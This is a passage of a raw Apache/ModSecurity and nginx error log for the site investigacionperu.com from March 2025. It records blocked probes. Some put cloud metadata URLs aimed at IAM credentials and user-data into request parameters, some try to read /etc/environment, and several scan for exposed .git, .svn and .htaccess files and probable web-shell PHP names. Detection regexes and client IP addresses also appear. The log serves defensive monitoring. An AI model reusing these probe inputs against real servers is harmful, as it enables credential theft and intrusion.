"/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:target: http://169.254.169.254/latest/user-data"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zEQsU4gj5kGAvbE6h89wAAAE0"] [Thu Mar 20 20:43:39.849468 2025] [:error] [pid 3371:tid 140172616259328] [client 170.39.218.202:59946] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:dest. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:dest: /etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zES8fmlO6a7fiT45wn0wAAAMI"] [Thu Mar 20 20:44:14.322350 2025] [:error] [pid 3371:tid 140172532332288] [client 170.39.218.202:60028] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:dest. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:dest: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zEbsfmlO6a7fiT45wn5gAAAMw"] [Thu Mar 20 20:44:14.397193 2025] [:error] [pid 3371:tid 140172448405248] [client 170.39.218.202:60030] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:dest. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:dest: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zEbsfmlO6a7fiT45wn5wAAANY"] [Thu Mar 20 20:44:14.471957 2025] [:error] [pid 3128:tid 140172515546880] [client 170.39.218.202:60032] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:dest. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:dest: http://169.254.169.254/latest/meta-data/iam/security-credentials/admin-role"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zEbsU4gj5kGAvbE6h9AQAAAE4"] [Thu Mar 20 20:44:14.546846 2025] [:error] [pid 3371:tid 140172633044736] [client 170.39.218.202:60034] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:dest. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:dest: http://169.254.169.254/latest/user-data"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zEbsfmlO6a7fiT45wn6AAAAMA"] [Thu Mar 20 20:44:23.929979 2025] [:error] [pid 3371:tid 140172582688512] [client 170.39.218.202:60062] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:redirect. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:redirect: /etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zEd8fmlO6a7fiT45wn8AAAAMY"] [Thu Mar 20 20:44:56.679328 2025] [:error] [pid 3129:tid 140172540724992] [client 170.39.218.202:60144] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:redirect. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:redirect: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zEmPkYnT-GrN2Y0_ABeQAAAIs"] [Thu Mar 20 20:44:56.754628 2025] [:error] [pid 3128:tid 140172633044736] [client 170.39.218.202:60146] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:redirect. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:redirect: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zEmMU4gj5kGAvbE6h9BgAAAEA"] [Thu Mar 20 20:44:56.836963 2025] [:error] [pid 3128:tid 140172440012544] [client 170.39.218.202:60148] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:redirect. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:redirect: http://169.254.169.254/latest/meta-data/iam/security-credentials/admin-role"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zEmMU4gj5kGAvbE6h9BwAAAFc"] [Thu Mar 20 20:44:56.911933 2025] [:error] [pid 3129:tid 140172490368768] [client 170.39.218.202:60150] [client 170.39.218.202] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:redirect. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://169.254.169.254 found within ARGS:redirect: http://169.254.169.254/latest/user-data"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "Z9zEmPkYnT-GrN2Y0_ABegAAAJE"] 2025/03/20 23:17:21 [error] 3090#3090: *361710 access forbidden by rule, client: 170.39.218.202, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" [Fri Mar 21 13:50:34.330263 2025] [:error] [pid 21497:tid 140119365326592] [client 52.169.5.45:47794] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dropdown.php [Fri Mar 21 13:50:50.469936 2025] [:error] [pid 21497:tid 140119432468224] [client 52.169.5.45:47836] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dropdown.php [Fri Mar 21 13:51:05.001880 2025] [:error] [pid 20903:tid 140119331755776] [client 52.169.5.45:47872] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/afnew.php [Fri Mar 21 13:51:17.787907 2025] [autoindex:error] [pid 20901:tid 140119577020160] [client 52.169.5.45:47922] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 13:51:32.930850 2025] [autoindex:error] [pid 21497:tid 140119577020160] [client 52.169.5.45:47966] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 13:51:34.788006 2025] [autoindex:error] [pid 21497:tid 140119474431744] [client 52.169.5.45:47974] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 13:51:35.706327 2025] [:error] [pid 20903:tid 140119348541184] [client 52.169.5.45:47978] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Fri Mar 21 13:51:38.647093 2025] [:error] [pid 20903:tid 140119382112000] [client 52.169.5.45:47986] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/autoload_classmap.php [Fri Mar 21 14:32:27.892786 2025] [:error] [pid 21497:tid 140119323363072] [client 13.79.58.212:48562] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Mar 21 14:32:27.956562 2025] [:error] [pid 21497:tid 140119415682816] [client 13.79.58.212:48564] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Mar 21 14:33:07.232015 2025] [autoindex:error] [pid 21497:tid 140119314970368] [client 13.79.58.212:48658] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 14:33:16.701856 2025] [autoindex:error] [pid 21497:tid 140119449253632] [client 13.79.58.212:48680] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 14:33:17.762558 2025] [autoindex:error] [pid 21497:tid 140119373719296] [client 13.79.58.212:48684] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 14:33:19.784572 2025] [:error] [pid 21497:tid 140119390504704] [client 13.79.58.212:48690] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Mar 21 14:33:19.854037 2025] [:error] [pid 21497:tid 140119348541184] [client 13.79.58.212:48692] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php 2025/03/21 14:50:38 [error] 20864#20864: *371479 access forbidden by rule, client: 109.202.99.36, server: mail.investigacionperu.com, request: "GET /.svn/wc.db HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/21 14:50:38 [error] 20865#20865: *371475 access forbidden by rule, client: 109.202.99.36, server: mail.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "mail.investigacionperu.com" [Fri Mar 21 18:55:57.472308 2025] [autoindex:error] [pid 20903:tid 140119482824448] [client 43.163.2.72:52320] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com 2025/03/21 20:12:45 [error] 20864#20864: *373919 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/21 20:12:59 [error] 20865#20865: *373924 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/21 20:32:42 [error] 20865#20865: *373975 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/21 20:35:34 [error] 20865#20865: *373980 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/21 20:49:10 [error] 20865#20865: *374088 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/03/21 20:50:03 [error] 20865#20865: *374104 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Mar 21 21:48:48.474379 2025] [autoindex:error] [pid 21497:tid 140119348541184] [client 193.24.211.4:54842] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 21:48:51.233115 2025] [autoindex:error] [pid 20903:tid 140119323363072] [client 193.24.211.4:54844] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 21:48:54.586942 2025] [autoindex:error] [pid 20903:tid 140119373719296] [client 193.24.211.4:54846] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 21:48:57.539998 2025] [autoindex:error] [pid 20903:tid 140119365326592] [client 193.24.211.4:54848] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 21:49:01.100412 2025] [autoindex:error] [pid 20903:tid 140119348541184] [client 193.24.211.4:54850] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 21:49:03.634554 2025] [autoindex:error] [pid 20903:tid 140119398897408] [client 193.24.211.4:54852] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 21:49:07.073352 2025] [autoindex:error] [pid 20903:tid 140119356933888] [client 193.24.211.4:54854] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 21:49:10.149863 2025] [autoindex:error] [pid 21497:tid 140119466039040] [client 193.24.211.4:54856] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 21:49:13.962626 2025] [autoindex:error] [pid 20901:tid 140119382112000] [client 193.24.211.4:54858] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 21:49:17.083599 2025] [autoindex:error] [pid 21497:tid 140119568627456] [client 193.24.211.4:54860] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 21:49:21.110322 2025] [autoindex:error] [pid 21497:tid 140119331755776] [client 193.24.211.4:54862] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 21:49:24.592722 2025] [autoindex:error] [pid 21497:tid 140119474431744] [client 193.24.211.4:54864] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 21:52:01.160083 2025] [autoindex:error] [pid 21497:tid 140119577020160] [client 193.24.211.4:54932] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Mar 21 21:52:03.281237 2025] [autoindex:error] [pid 21497:tid 140119415682816] [client 193.24.211.4:54934] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2025/03/21 21:57:49 [error] 20864#20864: *375017 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/21 21:58:11 [error] 20864#20864: *375036 access forbidden by rule, client: 45.148.10.86, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2025/03/21 22:15:27 [error] 20865#20865: *375250 access forbidden by rule, client: 87.106.151.13, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/21 22:15:27 [error] 20864#20864: *375251 access forbidden by rule, client: 87.106.151.13, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/21 23:03:14 [error] 20865#20865: *375917 access forbidden by rule, client: 170.39.218.176, server: cpanel.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/21 23:03:37 [error] 20864#20864: *375920 access forbidden by rule, client: 170.39.218.176, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/21 23:03:37 [error] 20864#20864: *375920 access forbidden by rule, client: 170.39.218.176, server: cpanel.investigacionperu.com, request: "GET /.svn/entries HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/21 23:03:42 [error] 20864#20864: *375920 access forbidden by rule, client: 170.39.218.176, server: cpanel.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/21 23:03:42 [error] 20864#20864: *375920 access forbidden by rule, client: 170.39.218.176, server: cpanel.investigacionperu.com, request: "GET /.git/index HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/21 23:03:42 [error] 20864#20864: *375920 access forbidden by rule, client: 170.39.218.176, server: cpanel.investigacionperu.com, request: "GET /.git/logs/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/21 23:03:58 [error] 20864#20864: *375920 access forbidden by rule, client: 170.39.218.176, server: cpanel.investigacionperu.com, request: "GET /.htaccess HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/21 23:04:26 [error] 20864#20864: *375920 access forbidden by rule, client: 170.39.218.176, server: cpanel.investigacionperu.com, request: "GET /.git/logs/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/21 23:04:26 [error] 20864#20864: *375920 access forbidden by rule, client: 170.39.218.176, server: cpanel.investigacionperu.com, request: "GET /.git/refs/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/21 23:04:26 [error] 20864#20864: *375920 access forbidden by rule, client: 170.39.218.176, server: cpanel.investigacionperu.com, request: "GET /.git/objects/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/21 23:04:26 [error] 20864#20864: *375920 access forbidden by rule, client: 170.39.218.176, server: cpanel.investigacionperu.com, request: "GET /.git/packed-refs HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/21 23:04:26 [error] 20864#20864: *375920 access forbidden by rule, client: 170.39.218.176, server: cpanel.investigacionperu.com, request: "GET /.git/branches/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/22 00:16:14 [error] 20864#20864: *376840 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/22 00:19:10 [error] 20864#20864: *376853 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2025/03/22 05:00:10 [error] 32709#32709: *380480 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/03/22 05:00:17 [error] 32710#32710: *380485 access forbidden by rule, client: 45.148.10.86, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2025/03/22 06:24:53 [error] 32710#32710: *380932 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/22 06:25:30 [error] 32710#32710: *380937 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/22 06:26:19 [error] 32710#32710: *380938 access forbidden by rule, client: 45.148.10.86, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2025/03/22 06:27:10 [error] 32710#32710: *380943 access forbidden by rule, client: 45.148.10.86, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Sat Mar 22 07:42:10.545728 2025] [autoindex:error] [pid 900:tid 140515256313600] [client 52.169.88.234:38404] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 07:42:47.517317 2025] [autoindex:error] [pid 900:tid 140515064366848] [client 52.169.88.234:38480] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 07:42:50.762518 2025] [autoindex:error] [pid 900:tid 140515131508480] [client 52.169.88.234:38488] AH01276: Cannot serve directory 